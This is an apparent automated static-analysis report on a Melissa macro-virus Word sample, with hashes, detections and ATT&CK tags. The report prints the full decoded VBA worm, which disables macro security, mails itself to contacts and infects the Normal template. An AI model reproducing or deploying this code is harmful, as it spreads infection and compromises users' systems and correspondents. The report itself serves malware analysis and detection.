Melissa — Office (OLE) malware analysis

Static analysis result for SHA-256 15bee15b6bcbde0e…

MALICIOUS

Office (OLE)

446.5 KB Created: 2007-11-21 15:36:00 Authoring application: Microsoft Word 9.0 First seen: 2016-04-16
MD5: 006bf123cfce276dcc5006c19547285c SHA-1: 5392bfc022a2ea62bd782d4cf35f3d4e949ad0ae SHA-256: 15bee15b6bcbde0efa48c2bb934ca2a98955cba47921d336642262aa8635000a
208 Risk Score

Malware Insights

Melissa · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample is a Microsoft Word document containing a VBA macro named 'Melissa' that executes upon opening. This macro attempts to disable security warnings and then uses Outlook to send copies of itself to contacts in the user's address book. The ClamAV detection of 'Win.Trojan.Melissa-4' strongly suggests this is a variant of the Melissa virus, known for its email propagation capabilities.

Heuristics 5

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Attribute VB_Name = "Melissa" Attribute VB_Base = "1Normal.Melissa" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CU …
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Name = "Melissa" Attribute VB_Base = "1Normal.Melissa" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CU …
  • NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED
    Long run of 0x40 bytes
    Disassembly
    Attempted x86 opcode disassembly
    0000592D  40                inc eax
    0000592E  40                inc eax
    0000592F  40                inc eax
    00005930  40                inc eax
    00005931  40                inc eax
    00005932  40                inc eax
    00005933  40                inc eax
    00005934  40                inc eax
    00005935  40                inc eax
    00005936  40                inc eax
    00005937  40                inc eax
    00005938  40                inc eax
    00005939  40                inc eax
    0000593A  40                inc eax
    0000593B  40                inc eax
    0000593C  40                inc eax
    0000593D  40                inc eax
    0000593E  40                inc eax
    0000593F  40                inc eax
    00005940  40                inc eax
    00005941  40                inc eax
    00005942  40                inc eax
    00005943  40                inc eax
    00005944  40                inc eax
    00005945  40                inc eax
    00005946  40                inc eax
    00005947  40                inc eax
    00005948  40                inc eax
    00005949  40                inc eax
    0000594A  40                inc eax
    0000594B  40                inc eax
    0000594C  40                inc eax
    0000594D  40                inc eax
    0000594E  40                inc eax
    0000594F  40                inc eax
    00005950  40                inc eax
    00005951  40                inc eax
    00005952  40                inc eax
    00005953  40                inc eax
    00005954  40                inc eax
    00005955  40                inc eax
    00005956  40                inc eax
    00005957  40                inc eax
    00005958  40                inc eax
    00005959  40                inc eax
    0000595A  40                inc eax
    0000595B  40                inc eax
    0000595C  40                inc eax
    0000595D  40                inc eax
    0000595E  40                inc eax
    0000595F  40                inc eax
    00005960  40                inc eax
    00005961  40                inc eax
    00005962  40                inc eax
    00005963  40                inc eax
    00005964  40                inc eax
    00005965  40                inc eax
    00005966  40                inc eax
    00005967  40                inc eax
    00005968  40                inc eax
    00005969  40                inc eax
    0000596A  40                inc eax
    0000596B  40                inc eax
    0000596C  40                inc eax
    0000596D  40                inc eax
    0000596E  40                inc eax
    0000596F  40                inc eax
    00005970  40                inc eax
    00005971  40                inc eax
    00005972  40                inc eax
    00005973  40                inc eax
    00005974  40                inc eax
    00005975  40                inc eax
    00005976  40                inc eax
    00005977  40                inc eax
    00005978  40                inc eax
    00005979  40                inc eax
    0000597A  40                inc eax
    0000597B  40                inc eax
    0000597C  40                inc eax
    0000597D  40                inc eax
    0000597E  40                inc eax
    0000597F  40                inc eax
    00005980  40                inc eax
    00005981  40                inc eax
    00005982  40                inc eax
    00005983  40                inc eax
    00005984  40                inc eax
    00005985  40                inc eax
    00005986  40                inc eax
    00005987  40                inc eax
    00005988  40                inc eax
    00005989  40                inc eax
    0000598A  40                inc eax
    0000598B  40                inc eax
    0000598C  40                inc eax

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3743 bytes
SHA-256: 1cdfa4537e4bb35726cb0d0660c1b5e7fb4d08aec222549ea3334a925ce96e81
Detection
ClamAV: Doc.Trojan.Melissa-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Melissa"
Attribute VB_Base = "1Normal.Melissa"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
    For y = 1 To DasMapiName.AddressLists.Count
        Set AddyBook = DasMapiName.AddressLists(y)
        x = 1
        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
        For oo = 1 To AddyBook.AddressEntries.Count
            Peep = AddyBook.AddressEntries(x)
            BreakUmOffASlice.Recipients.Add Peep
            x = x + 1
            If x > 50 Then oo = AddyBook.AddressEntries.Count
         Next oo
         BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
         BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
         BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
         BreakUmOffASlice.Send
         Peep = ""
    Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.codemodule.CountOfLines
ADCL = ADI1.codemodule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.codemodule.deletelines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.codemodule.deletelines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.codemodule.Lines(1, 1) = ""
ADI1.codemodule.deletelines 1
Loop
ToInfect.codemodule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.codemodule.Lines(BGN, 1) <> ""
ToInfect.codemodule.InsertLines BGN, ADI1.codemodule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.codemodule.Lines(1, 1) = ""
NTI1.codemodule.deletelines 1
Loop
ToInfect.codemodule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.codemodule.Lines(BGN, 1) <> ""
ToInfect.codemodule.InsertLines BGN, NTI1.codemodule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta here."
End Sub